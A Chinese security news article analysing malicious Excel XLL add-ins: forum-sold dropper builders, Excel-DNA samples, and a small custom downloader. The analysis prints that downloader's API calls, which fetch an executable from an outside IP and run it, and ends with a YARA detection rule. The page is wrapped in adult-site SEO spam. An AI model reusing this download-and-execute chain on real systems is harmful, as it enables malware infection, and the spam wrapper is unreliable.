成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

攻擊者開始使用 XLL 文件進行攻擊

安全 網站安全
近期,研究人員發現使用惡意 Microsoft Excel 加載項(XLL)文件發起攻擊的行動有所增加。

近期,研究人員發現使用惡意 Microsoft Excel 加載項(XLL)文件發起攻擊的行動有所增加,這項技術的 MITRE ATT&CK 技術項編號為 T1137.006。

這些加載項都是為了使用戶能夠利用高性能函數,為 Excel 工作表提供 API 調用接口。與 VBA 等其他接口相比,該方式能夠更有效地擴展 Excel 的能力,使其支持更多功能,例如多線程。現在,攻擊者也濫用這項技術來達成自己的惡意目標。

攻擊者將帶有惡意 XLL 附件或者惡意鏈接的電子郵件發送給用戶,受害者點擊附件打開 Microsoft Excel 后會提示其安裝并激活加載項。

提示信息

攻擊者通常將代碼置于 xlAutoOpen函數中,該函數會在加載項被激活時立即觸發執行。這意味著,與要求用戶啟用宏的 VBA 宏不同,受害者只要打開就會執行惡意代碼。

由于 XLL 是可移植的可執行文件,許多電子郵件網關都會攔截該格式的文件或者僅允許受信任簽名的加載項。

XLL 惡意軟件出售

因為 XLL 惡意文件的快速增長,我們在地下犯罪論壇上進行了相應的調查,評估使用這種文件格式的惡意工具和服務的流行程度。

在讀個地下犯罪論壇中,反復看到來自同一個攻擊者的廣告,正在銷售一個可以創建 XLL Dropper 的構建工具。

地下論壇銷售廣告

用戶指定一個可執行文件或下載誘餌文件的鏈接地址,生成 XLL 文件。

構建工具截圖

EXCEL-DNA 生成加載項

發現的 XLL 文件大部分都有相同的結構,本質上說,XLL 文件是包含 xlAutoOpen導出函數的 DLL 文件。這些 XLL 文件應該是使用 Excel-DNA工具生成的,包含多個大型的資源。

文件資源段結構

其中包含 Excel-DNA 項目組件以及加載項,可以通過查看資源名或者同樣存儲在資源中的 XML 定義文件來識別包含 Excel 加載項的 XLL 文件。

XML 文件

包含惡意代碼的加載項是使用 .NET 開發的,位于 MODDNA資源中。要分析該惡意代碼,需要將資源保存到硬盤并使用 LZMA 算法進行解壓縮。對 .NET 文件進行反編譯后,可見 XLL 加載項的啟動函數,該加載項為惡意軟件 Downloader。

.NET 文件代碼

使用 Excel-DNA 項目創建的 XLL 文件也可以使用項目提供的腳本自動解壓縮,該腳本將 XLL 文件的路徑作為參數,然后提取、解壓縮并將資源保存到文件夾中。

提取 XLL 文件

自定義生成的加載項

其他不使用 Excel-DNA 的 XLL 文件中,一個 Downloader 大小只有 4.5 KB,但吸引了研究人員的注意。與其他 XLL 文件一樣,該文件也具有導出函數 xlAutoOpen。為了混淆程序控制流,樣本中包含許多連續的 jmp指令。

動態調試截圖

經過分析后,研究人員發現可執行代碼后有一段加密數據。數據在循環中解密,首先確定數據的位置與大小,緊接著進行異或解密。每處理八個字節,密鑰就要對用改變。

解密代碼

一旦數據被解密,樣本可以提取三個 DLL 文件名、五個 API 函數名、Payload 的 URL 以及存儲 Payload 的本地文件路徑。樣本首先通過進程環境塊(PEB)遍歷 InLoadOrderModuleList正確解析所需 DLL 的基址,然后再找到希望調用的 API 函數地址。

解析加載模塊

然后,惡意軟件使用解析后的 API 函數下載 Payload 并將其存儲執行。在此樣本中,API 調用如下所示:

GetProcAddress(“ExpandEnvironmentStringsW”)

ExpandEnvironmentStringsW(“”%APPDATA%\joludn.exe””)

LoadLibraryW(“UrlMon”)

GetProcAddress(“URLToDownloadFile”)

URLToDownloadFile(“hxxp://141.95.107[.]91/cgi/dl/8521000125423.exe”, “C:\Users\REDACTED\AppData\Roaming\joludn.exe”)

_wsystem(“C:\Users\REDACTED\AppData\Roaming\joludn.exe”)

檢測 XLL 惡意文件的 Yara 規則為:

rule xll_custom_builder
{
meta:
description = "XLL Custom Builder"
author = "patrick.schlapfer@hp.com"
date = "2022-01-07"

strings:
str2 = "test"
op2 = { 4D 31 0E }
op4 = { 49 39 C6 }

condition:
uint16(0) == 0x5A4D and all of (op*) and filesize < 10KB
}

結論

Microsoft Excel 提供了許多合法執行代碼的方式,如 Excel 4.0 宏、DDE 和 VBA,這些都已經被攻擊者濫用。近期,研究人員發現,Dridex、Agent Tesla、Raccoon Stealer 和 Formbook 等惡意軟件家族也開始利用 XLL 文件進行傳播。利用 XLL 文件攻擊的數量增長,表明攻擊者對這種技術很感興趣。

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2021-11-04 05:48:43

SSL加密攻擊勒索軟件

2022-03-05 12:00:11

網絡釣魚網絡攻擊

2014-08-20 09:44:57

2021-11-11 12:03:37

勒索軟件攻擊漏洞

2023-05-15 15:59:07

2021-03-15 13:56:00

DDoS攻擊加密貨幣

2021-01-22 10:54:01

網絡攻擊Accellion F網絡安全

2022-02-13 23:12:34

網絡釣魚谷歌Google

2023-04-21 19:01:55

2022-01-04 11:58:49

Docker API網絡攻擊文件加密

2016-01-05 15:54:32

2014-10-08 09:25:30

2023-12-19 16:31:19

2012-03-13 15:30:28

2021-10-31 07:22:46

TikTok惡意廣告惡意軟件

2022-08-19 15:40:08

密碼證書安全

2023-10-25 15:08:23

2021-04-29 09:36:23

攻擊漏洞Kubernetes

2021-08-02 08:55:50

Argo網絡Kubernetes云集群

2022-03-15 11:51:33

網絡釣魚Intuit公司報稅軟件
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久久久精 | 97色在线观看免费视频 | 青青艹在线视频 | 四虎永久 | 国产女人精品视频 | 欧美成人一区二区三区 | 天天干夜夜操 | 日韩免费网站 | 蜜桃精品视频在线 | 欧美国产视频 | 精品亚洲一区二区 | 国产福利资源在线 | 精品国产一二三区 | 亚洲第一福利网 | 美日韩精品 | 在线免费观看黄网 | 亚洲狠狠 | 国产一区二区三区四区 | 国产69精品久久99不卡免费版 | 亚洲美女视频 | 天天插天天操 | 在线观看免费福利 | 97精品超碰一区二区三区 | 九九九色| 国产成人久久精品一区二区三区 | 国产亚洲一区二区精品 | 亚洲视频一区二区三区 | 日韩精品一区二区在线 | 午夜影院在线观看 | 天天干天天操天天看 | 国产精品视频一 | 国产精品视频区 | 黄色片大全在线观看 | 国产成都精品91一区二区三 | 国产一区二区三区四区五区3d | 国产在线视频在线观看 | 三级特黄特色视频 | 精品视频999 | 一区二区三区国产精品 | 毛片久久久 | 国产精品一区二区av |